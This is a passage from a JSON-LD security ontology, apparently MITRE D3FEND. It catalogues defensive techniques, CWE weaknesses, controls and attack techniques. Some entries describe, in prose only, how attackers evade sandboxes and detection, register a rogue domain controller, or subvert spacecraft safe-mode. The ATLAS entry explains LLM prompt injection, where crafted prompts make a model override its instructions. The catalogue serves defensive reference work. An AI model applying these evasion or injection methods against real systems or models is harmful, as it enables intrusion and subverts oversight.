      "rdfs:label": "Exploit Protection"
    },
    {
      "@id": "d3f:Reference-Windows10STIG",
      "@type": [
        "owl:NamedIndividual",
        "d3f:GuidelineReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.stigviewer.com/stig/windows_10/"
      },
      "d3f:kb-abstract": "Windows 10 STIG guidance.",
      "d3f:kb-reference-of": {
        "@id": "d3f:ApplicationConfigurationHardening"
      },
      "d3f:kb-reference-title": "Windows 10 Security Technical Implementation Guide",
      "rdfs:label": "Reference - Windows 10 STIG"
    },
    {
      "@id": "d3f:BootstrapAggregating",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-BA",
      "d3f:definition": "Bootstrap aggregating, also called bagging (from bootstrap aggregating), is a machine learning ensemble meta-algorithm designed to improve the stability and accuracy of machine learning algorithms used in statistical classification and regression. It also reduces variance and helps to avoid overfitting. Although it is usually applied to decision tree methods, it can be used with any type of method. Bagging is a special case of the model averaging approach.",
      "d3f:kb-article": "## References\nBootstrap aggregating. Wikipedia.  [Link](https://en.wikipedia.org/wiki/Bootstrap_aggregating).",
      "rdfs:label": "Bootstrap Aggregating",
      "rdfs:subClassOf": {
        "@id": "d3f:ResamplingEnsemble"
      }
    },
    {
      "@id": "d3f:TA0029",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "rdfs:label": "Privilege Escalation - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ],
      "skos:prefLabel": "Privilege Escalation"
    },
    {
      "@id": "d3f:CWE-637",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-637",
      "d3f:definition": "The product uses a more complex mechanism than necessary, which could lead to resultant weaknesses when the mechanism is not correctly understood, modeled, configured, implemented, or used.",
      "d3f:synonym": "Unnecessary Complexity",
      "rdfs:label": "Unnecessary Complexity in Protection Mechanism (Not Using 'Economy of Mechanism')",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-657"
      }
    },
    {
      "@id": "d3f:ATLASTactic",
      "@type": "owl:Class",
      "d3f:definition": "An ATLAS Tactic is a categorical classification of techniques within the MITRE ATLAS™ framework, representing adversarial goals particular to artificial intelligence systems. It also adapts MITRE ATT&CK® Enterprise Matrix tactics by integrating machine learning concepts, thus capturing the unique motives behind actions in AI-specific operations.",
      "rdfs:label": "ATLAS Tactic",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/tactics"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASThing"
      }
    },
    {
      "@id": "d3f:DE-0005",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "DE-0005",
      "d3f:definition": "The adversary exploits the spacecraft’s recovery posture to bypass controls that are stricter in nominal operations. During safe-mode, vehicles often accept contingency dictionaries, relax rate/size and timetag checks, activate alternate receivers or antennas, and emit reduced or summary telemetry. By timing actions to this state, or deliberately inducing it, the attacker issues maintenance-looking edits, loads, or mode changes that proceed under broadened acceptance while downlink visibility is thinned. Unauthorized activity blends with anomaly response, evading both automated safeguards and operator suspicion.",
      "d3f:modifies": {
        "@id": "d3f:VehicleOperatingMode"
      },
      "rdfs:label": "Subvert Protections via Safe-Mode - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/DE-0005/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SPARTADefenseEvasionTechnique"
        },
        {
          "@id": "_:N90a7bcf6667e4ec99747ad4621b4d33c"
        }
      ],
      "skos:prefLabel": "Subvert Protections via Safe-Mode"
    },
    {
      "@id": "_:N90a7bcf6667e4ec99747ad4621b4d33c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:VehicleOperatingMode"
      }
    },
    {
      "@id": "d3f:T1633",
      "@type": "owl:Class",
      "d3f:attack-id": "T1633",
      "d3f:definition": "Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors after checking for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware’s behavior to disengage from the victim or conceal the core functions of the payload. They may also search for VME artifacts before dropping further payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1633) during automated discovery to shape follow-on behaviors.",
      "rdfs:label": "Virtualization/Sandbox Evasion - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileDefenseEvasionTechnique"
      },
      "skos:prefLabel": "Virtualization/Sandbox Evasion"
    },
    {
      "@id": "d3f:Reference-DNSWhitelist-DNSWL-EmailAuthenticationMethodExtension",
      "@type": [
        "owl:NamedIndividual",
        "d3f:SpecificationReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://datatracker.ietf.org/doc/html/rfc8904"
      },
      "d3f:kb-reference-of": {
        "@id": "d3f:DNSAllowlisting"
      },
      "d3f:kb-reference-title": "DNS Whitelist (DNSWL) Email Authentication Method Extension",
      "rdfs:label": "Reference - DNS Whitelist (DNSWL) Email Authentication Method Extension"
    },
    {
      "@id": "d3f:Density-weightedMethod",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-DWM",
      "d3f:definition": "An Actvie Learning technique that uses a density estimate meta-parameter to avoid sampling sparsely populated regions of the feature space and can be based parametrically or from a parameter free model.",
      "d3f:kb-article": "## References\nIntro to Active Learning. inovex Blog. [Link](https://www.inovex.de/de/blog/intro-to-active-learning/).",
      "rdfs:label": "Density-weighted Method",
      "rdfs:subClassOf": {
        "@id": "d3f:ActiveLearning"
      }
    },
    {
      "@id": "d3f:T1207",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1207",
      "d3f:definition": "Adversaries may register a rogue Domain Controller to enable manipulation of Active Directory data. DCShadow may be used to create a rogue Domain Controller (DC). DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a DC. (Citation: DCShadow Blog) Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys.",
      "d3f:modifies": {
        "@id": "d3f:SystemConfigurationDatabase"
      },
      "d3f:produces": {
        "@id": "d3f:IntranetAdministrativeNetworkTraffic"
      },
      "rdfs:label": "Rogue Domain Controller",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "_:Nc865a11cbbec4bed95ec029b72950137"
        },
        {
          "@id": "_:Nd289bd4956bf4f54911ef7d11bc39328"
        }
      ]
    },
    {
      "@id": "_:Nc865a11cbbec4bed95ec029b72950137",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemConfigurationDatabase"
      }
    },
    {
      "@id": "_:Nd289bd4956bf4f54911ef7d11bc39328",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:IntranetAdministrativeNetworkTraffic"
      }
    },
    {
      "@id": "d3f:HardwareDeviceConfiguration",
      "@type": "owl:Class",
      "d3f:definition": "Information used to configure the parameters and settings for hardware devices.",
      "rdfs:label": "Hardware Device Configuration",
      "rdfs:subClassOf": {
        "@id": "d3f:ConfigurationResource"
      }
    },
    {
      "@id": "d3f:CWE-366",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-366",
      "d3f:definition": "If two threads of execution use a resource simultaneously, there exists the possibility that resources may be used while invalid, in turn making the state of execution undefined.",
      "rdfs:label": "Race Condition within a Thread",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-362"
      }
    },
    {
      "@id": "d3f:AuthenticationServiceApplication",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A software application designed to verify the identity of users or devices.",
      "d3f:instructs": {
        "@id": "d3f:AuthenticationService"
      },
      "rdfs:label": "Authentication Service Application",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ServiceApplication"
        },
        {
          "@id": "_:N95ac79caf17643bf8452afc3f3ba3629"
        }
      ]
    },
    {
      "@id": "_:N95ac79caf17643bf8452afc3f3ba3629",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:instructs"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AuthenticationService"
      }
    },
    {
      "@id": "d3f:description",
      "@type": "owl:AnnotationProperty",
      "d3f:definition": "A statement that represents something in words.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/06737512-n"
      },
      "rdfs:label": {
        "@language": "en",
        "@value": "description"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-catalog-annotation-property"
      }
    },
    {
      "@id": "d3f:TA0009",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "d3f:definition": "The adversary is trying to gather data of interest to their goal.\n\nCollection consists of techniques adversaries may use to gather information and the sources information is collected from that are relevant to following through on the adversary's objectives. Frequently, the next goal after collecting data is to either steal (exfiltrate) the data or to use the data to gain more information about the target environment. Common target sources include various drive types, browsers, audio, video, and email. Common collection methods include capturing screenshots and keyboard input.",
      "d3f:display-order": 9,
      "rdfs:label": "Collection",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKEnterpriseTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ]
    },
    {
      "@id": "d3f:T1036.003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1036.003",
      "d3f:definition": "Adversaries may rename legitimate system utilities to try to evade security mechanisms concerning the usage of those utilities. Security monitoring and control mechanisms may be in place for system utilities adversaries are capable of abusing. (Citation: LOLBAS Main Site) It may be possible to bypass those security mechanisms by renaming the utility prior to utilization (ex: rename <code>rundll32.exe</code>). (Citation: Elastic Masquerade Ball) An alternative case occurs when a legitimate utility is copied or moved to a different directory and renamed to avoid detections based on system utilities executing from non-standard paths. (Citation: F-Secure CozyDuke)",
      "d3f:may-create": {
        "@id": "d3f:ExecutableFile"
      },
      "d3f:may-modify": {
        "@id": "d3f:OperatingSystemExecutableFile"
      },
      "rdfs:label": "Rename Legitimate Utilities",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1036"
        },
        {
          "@id": "_:N0d98efc26d5244c0906fc37d46273eca"
        },
        {
          "@id": "_:N705185fd6c5f43f4ad6a60c506db5db0"
        }
      ]
    },
    {
      "@id": "_:N0d98efc26d5244c0906fc37d46273eca",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-create"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ExecutableFile"
      }
    },
    {
      "@id": "_:N705185fd6c5f43f4ad6a60c506db5db0",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OperatingSystemExecutableFile"
      }
    },
    {
      "@id": "d3f:T1630.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1630.002",
      "d3f:definition": "Adversaries may wipe a device or delete individual files in order to manipulate external outcomes or hide activity. An application must have administrator access to fully wipe the device, while individual files may not require special permissions to delete depending on their storage location.(Citation: Android DevicePolicyManager 2019)",
      "rdfs:label": "File Deletion - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1630"
      },
      "skos:prefLabel": "File Deletion"
    },
    {
      "@id": "d3f:T1402",
      "@type": "owl:Class",
      "d3f:attack-id": "T1402",
      "d3f:definition": "An intent is a message passed between Android application or system components. Applications can register to receive broadcast intents at runtime, which are system-wide intents delivered to each app when certain events happen on the device, such as network changes or the user unlocking the screen. Malicious applications can then trigger certain actions within the app based on which broadcast intent was received.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1624.001",
      "rdfs:label": "Broadcast Receivers - ATTACK Mobile",
      "rdfs:seeAlso": {
        "@id": "d3f:T1624.001"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileExecutionTechnique"
        },
        {
          "@id": "d3f:ATTACKMobilePersistenceTechnique"
        }
      ],
      "skos:prefLabel": "Broadcast Receivers"
    },
    {
      "@id": "d3f:AML.T0051",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0051",
      "d3f:definition": "An adversary may craft malicious prompts as inputs to an LLM that cause the LLM to act in unintended ways.\nThese \"prompt injections\" are often designed to cause the model to ignore aspects of its original instructions and follow the adversary's instructions instead.\n\nPrompt Injections can be an initial access vector to the LLM that provides the adversary with a foothold to carry out other steps in their operation.\nThey may be designed to bypass defenses in the LLM, or allow the adversary to issue privileged commands.\nThe effects of a prompt injection can persist throughout an interactive session with an LLM.\n\nMalicious prompts may be injected directly by the adversary ([Direct](/techniques/AML.T0051.000)) either to leverage the LLM to generate harmful content or to gain a foothold on the system and lead to further effects.\nPrompts may also be injected indirectly when as part of its normal operation the LLM ingests the malicious prompt from another data source ([Indirect](/techniques/AML.T0051.001)). This type of injection can be used by the adversary to a foothold on the system or to target the user of the LLM.\nMalicious prompts may also be [Triggered](/techniques/AML.T0051.002) user actions or system events.",
      "rdfs:label": "LLM Prompt Injection - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0051"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASExecutionTechnique"
      },
      "skos:prefLabel": "LLM Prompt Injection"
    },
    {
      "@id": "d3f:CWE-446",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-446",
      "d3f:definition": "The user interface does not correctly enable or configure a security feature, but the interface provides feedback that causes the user to believe that the feature is in a secure state.",
      "rdfs:label": "UI Discrepancy for Security Feature",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-684"
      }
    },
    {
      "@id": "d3f:CWE-1277",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1277",
      "d3f:definition": "The product does not provide its users with the ability to update or patch its firmware to address any vulnerabilities or weaknesses that may be present.",
      "rdfs:label": "Firmware Not Updateable",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1329"
      }
    },
    {
      "@id": "d3f:CWE-1395",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1395",
      "d3f:definition": "The product has a dependency on a third-party component that contains one or more known vulnerabilities.",
      "rdfs:label": "Dependency on Vulnerable Third-Party Component",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-657"
      }
    },
    {
      "@id": "d3f:T1001.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1001.001",
      "d3f:definition": "Adversaries may add junk data to protocols used for command and control to make detection more difficult.(Citation: FireEye SUNBURST Backdoor December 2020) By adding random or meaningless data to the protocols used for command and control, adversaries can prevent trivial methods for decoding, deciphering, or otherwise analyzing the traffic. Examples may include appending/prepending data with junk characters or writing junk characters between significant characters.",
      "rdfs:label": "Junk Data",
      "rdfs:subClassOf": {
        "@id": "d3f:T1001"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_SI-4",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:broader": {
        "@id": "d3f:OperatingSystemMonitoring"
      },
      "d3f:control-name": "System Monitoring",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "rdfs:label": "SI-4"
    },
    {
      "@id": "d3f:T1208",
      "@type": "owl:Class",
      "d3f:attack-id": "T1208",
      "d3f:definition": "Service principal names (SPNs) are used to uniquely identify each instance of a Windows service. To enable authentication, Kerberos requires that SPNs be associated with at least one service logon account (an account specifically tasked with running a service (Citation: Microsoft Detecting Kerberoasting Feb 2018)). (Citation: Microsoft SPN) (Citation: Microsoft SetSPN) (Citation: SANS Attacking Kerberos Nov 2014) (Citation: Harmj0y Kerberoast Nov 2016)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1558.003",
      "rdfs:label": "Kerberoasting",
      "rdfs:seeAlso": {
        "@id": "d3f:T1558.003"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:CredentialAccessTechnique"
      }
    },
    {
      "@id": "d3f:TunnelCloseEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a network tunnel is terminated, ending encapsulated communication and releasing the associated resources.",
      "rdfs:label": "Tunnel Close Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:TunnelEvent"
        },
        {
          "@id": "_:Nfbb6309aaa5740cc84da8aa719428810"
        }
      ]
    },
    {
      "@id": "_:Nfbb6309aaa5740cc84da8aa719428810",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TunnelOpenEvent"
      }
    },
    {
      "@id": "d3f:InboundSessionVolumeAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:InboundSessionVolumeAnalysis"
      ],
      "d3f:analyzes": {
        "@id": "d3f:InboundInternetNetworkTraffic"
      },
      "d3f:d3fend-id": "D3-ISVA",
      "d3f:definition": "Analyzing inbound network session or connection attempt volume.",
      "d3f:kb-article": "## How it works\nNetwork appliances are configured to alert on certain packets that typically are involved in DoS attacks. Typical packets include ICMP packets and SYN requests that are commonly used to flood networks. A sampling period is used to define a time window in which collected counts of the identified packets can be measured. If the collected number of packets exceeds a predefined limit then an alert is generated.\n\n## Considerations\nScalability as volume of attacks increase; single servers may not have the memory and storage resources to handle high volumes of network traffic.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-DetectingDDoSAttackUsingSnort"
        },
        {
          "@id": "d3f:Reference-IdentifyingADenial-of-serviceAttackInACloud-basedProxyService-CloudfareInc."
        },
        {
          "@id": "d3f:Reference-MethodAndSystemForUDPFloodAttackDetection-RioreyLLC"
        },
        {
          "@id": "d3f:Reference-ProtectingAgainstDistributedDenialOfServiceAttacks-CiscoTechnologyInc."
        },
        {
          "@id": "d3f:Reference-ProtectingAgainstDistributedNetworkFloodAttacks-JuniperNetworksInc."
        }
      ],
      "rdfs:label": "Inbound Session Volume Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkTrafficAnalysis"
        },
        {
          "@id": "_:N986722107401435e91f8c95bab72a053"
        }
      ]
    },
    {
      "@id": "_:N986722107401435e91f8c95bab72a053",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:InboundInternetNetworkTraffic"
      }
    },
    {
      "@id": "d3f:ThinClientComputer",
      "@type": "owl:Class",
      "d3f:definition": "A thin client is a lightweight computer that has been optimized for establishing a remote connection with a server-based computing environment. The server does most of the work, which can include launching software programs, performing calculations, and storing data. This contrasts with a fat client or a conventional personal computer; the former is also intended for working in a client-server model but has significant local processing power, while the latter aims to perform its function mostly locally. Thin clients are shared computers as the thin client's computing resources are provided by a remote server.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Thin_client"
      },
      "rdfs:label": "Thin Client Computer",
      "rdfs:subClassOf": {
        "@id": "d3f:SharedComputer"
      }
    },
    {
      "@id": "d3f:DHCPLeaseExpireEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event indicating that a DHCP lease has expired, rendering the previously assigned IP address available for reassignment to other devices.",
      "rdfs:label": "DHCP Lease Expire Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DHCPEvent"
        },
        {
          "@id": "_:N0025c71428514f86b93f06f3985d38c8"
        }
      ],
      "skos:altLabel": "DHCPLEASEEXPIRE"
    },
    {
      "@id": "_:N0025c71428514f86b93f06f3985d38c8",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DHCPAckEvent"
      }
    },
    {
      "@id": "d3f:DigitalVideo",
      "@type": "owl:Class",
      "d3f:definition": "Digital video is an electronic representation of moving visual images (video) in the form of encoded digital data.",
      "rdfs:isDefinedBy": "https://dbpedia.org/page/Digital_video",
      "rdfs:label": "Digital Video",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalMedia"
      }
    },
    {
      "@id": "d3f:interprets",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x interprets y: The subject x interprets the executable script y. The definition of interprets here is 'Parse the source code and perform its behavior directly.'",
      "rdfs:label": "interprets",
      "rdfs:seeAlso": {
        "@id": "dbr:Interpreter_(computing)"
      },
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:executes"
        },
        {
          "@id": "d3f:may-interpret"
        }
      ]
    },
    {
      "@id": "d3f:CWE-1253",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1253",
      "d3f:definition": "The logic level used to set a system to a secure state relies on a fuse being unblown. An attacker can set the system to an insecure state merely by blowing the fuse.",
      "rdfs:label": "Incorrect Selection of Fuse Values",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-693"
      }
    },
    {
      "@id": "d3f:CCI-002400_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system audits the identity of internal users associated with denied outgoing communications traffic posing a threat to external information systems.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:OutboundTrafficFiltering"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-02T00:00:00"
      },
      "rdfs:label": "CCI-002400"
    },
    {
      "@id": "d3f:Reference-UserLoginActivityMonitoring_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2013-10-001/"
      },
      "d3f:kb-abstract": "Monitoring logon and logoff events for hosts on the network is very important for situational awareness. This information can be used as an indicator of unusual activity as well as to corroborate activity seen elsewhere.\n\nCould be applied to a number of different types of monitoring depending on what information is desired. Some use cases include monitoring for all remote connections and building login timelines for users. Logon events are Windows Event Code 4624 for Windows Vista and above, 518 for pre-Vista. Logoff events are 4634 for Windows Vista and above, 538 for pre-Vista.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:AuthenticationEventThresholding"
      },
      "d3f:kb-reference-title": "CAR-2013-10-001: User Login Activity Monitoring",
      "rdfs:label": "Reference - CAR-2013-10-001: User Login Activity Monitoring - MITRE"
    },
    {
      "@id": "d3f:Reference-FIPS-201-3",
      "@type": [
        "owl:NamedIndividual",
        "d3f:SpecificationReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.201-3.pdf"
      },
      "d3f:kb-abstract": "This document establishes a standard for a Personal Identity Verification (PIV) system that meets the control and security objectives of Homeland Security Presidential Directive-12. It is based on secure and reliable forms of identity credentials issued by the Federal Government to its employees and contractors. These credentials are used by mechanisms that authenticate individuals who require access to federally controlled facilities, information systems, and applications. This Standard addresses requirements for initial identity proofing, infrastructure to support interoperability of identity credentials, and accreditation of organizations and processes issuing PIV credentials.",
      "d3f:kb-author": "NIST",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:ElectronicLockMonitoring"
        },
        {
          "@id": "d3f:ProximitySensorMonitoring"
        }
      ],
      "d3f:kb-reference-title": "FIPS 201-3: Personal Identity Verification (PIV) of Federal Employees and Contractors",
      "rdfs:label": "Reference - FIPS 201-3"
    },
    {
      "@id": "d3f:AccessMediationEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event involving the intermediary control mechanism that evaluates access requests and enforces access control decisions, ensuring that subjects' resource interactions comply with the established access policies.",
      "rdfs:label": "Access Mediation Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:AccessControlEvent"
        },
        {
          "@id": "_:N3b63fffd8eb54974b29e97d397ed06a3"
        }
      ],
      "skos:altLabel": "Access Enforcement Event"
    },
    {
      "@id": "_:N3b63fffd8eb54974b29e97d397ed06a3",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AccessMediator"
      }
    },
    {
      "@id": "d3f:CWE-796",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-796",
      "d3f:definition": "The product receives data from an upstream component, but only accounts for special elements positioned relative to a marker (e.g. \"at the beginning/end of a string; the second argument\"), thereby missing remaining special elements that may exist before sending it to a downstream component.",
      "rdfs:label": "Only Filtering Special Elements Relative to a Marker",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-795"
      }
    },
    {
      "@id": "d3f:T1090.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1090.002",
      "d3f:definition": "Adversaries may use an external proxy to act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths to avoid suspicion.",
      "d3f:produces": {
        "@id": "d3f:OutboundInternetNetworkTraffic"
      },
      "rdfs:label": "External Proxy",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1090"
        },
        {
          "@id": "_:N7886404da5d8459986d2b0fc68eca4a3"
        }
      ]
    },
    {
      "@id": "_:N7886404da5d8459986d2b0fc68eca4a3",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OutboundInternetNetworkTraffic"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-2_3",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:broader": {
        "@id": "d3f:AccountLocking"
      },
      "d3f:control-name": "Account Management | Disable Accounts",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "rdfs:label": "AC-2(3)"
    },
    {
      "@id": "d3f:EncryptedCredential",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A credential that is encrypted.",
      "rdfs:label": "Encrypted Credential",
      "rdfs:subClassOf": {
        "@id": "d3f:Credential"
      }
    },
    {
      "@id": "d3f:SoftwarePackage",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A Software Package is a bundled collection of files, code, and metadata that provides functionality, libraries, or applications.",
      "rdfs:label": "Software Package",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/objects/package"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalInformationBearer"
      }
    },
    {
      "@id": "d3f:Reference-ProtectingWebApplicationsFromUntrustedEndpointsUsingRemoteBrowserIsolation",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US11477248B2/"
      },
      "d3f:kb-reference-of": {
        "@id": "d3f:Application-basedProcessIsolation"
      },
      "d3f:kb-reference-title": "Protecting web applications from untrusted endpoints using remote browser isolation",
      "rdfs:label": "Reference - Protecting web applications from untrusted endpoints using remote browser isolation"
    },
    {
      "@id": "d3f:CWE-405",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-405",
      "d3f:definition": "The product does not properly control situations in which an adversary can cause the product to consume or produce excessive resources without requiring the adversary to invest equivalent work or otherwise prove authorization, i.e., the adversary's influence is \"asymmetric.\"",
      "rdfs:label": "Asymmetric Resource Consumption (Amplification)",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-400"
        },
        {
          "@id": "d3f:CWE-664"
        }
      ]
    },
    {
      "@id": "d3f:TransferLearning",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-TL",
      "d3f:definition": "Transfer learning (TL) is a research problem in machine learning (ML) that focuses on storing knowledge gained while solving one problem and applying it to a different but related problem.",
      "d3f:kb-article": "## References\nTransfer learning. Wikipedia.  [Link](https://en.wikipedia.org/wiki/Transfer_learning).",
      "rdfs:label": "Transfer Learning",
      "rdfs:seeAlso": [
        {
          "@id": "https://arxiv.org/abs/1808.01974"
        },
        {
          "@id": "https://arxiv.org/abs/1911.02685"
        },
        {
          "@id": "https://journalofbigdata.springeropen.com/articles/10.1186/s40537-016-0043-6"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:MachineLearning"
      }
    },
    {
      "@id": "d3f:CWE-58",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-58",
      "d3f:definition": "The product contains a protection mechanism that restricts access to a long filename on a Windows operating system, but it does not properly restrict access to the equivalent short \"8.3\" filename.",
      "rdfs:label": "Path Equivalence: Windows 8.3 Filename",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-41"
      }
    },
    {
      "@id": "d3f:CWE-106",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-106",
      "d3f:definition": "When an application does not use an input validation framework such as the Struts Validator, there is a greater risk of introducing weaknesses related to insufficient input validation.",
      "rdfs:label": "Struts: Plug-in Framework not in Use",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1173"
      }
    },
    {
      "@id": "d3f:AuthorizationEventThresholding",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
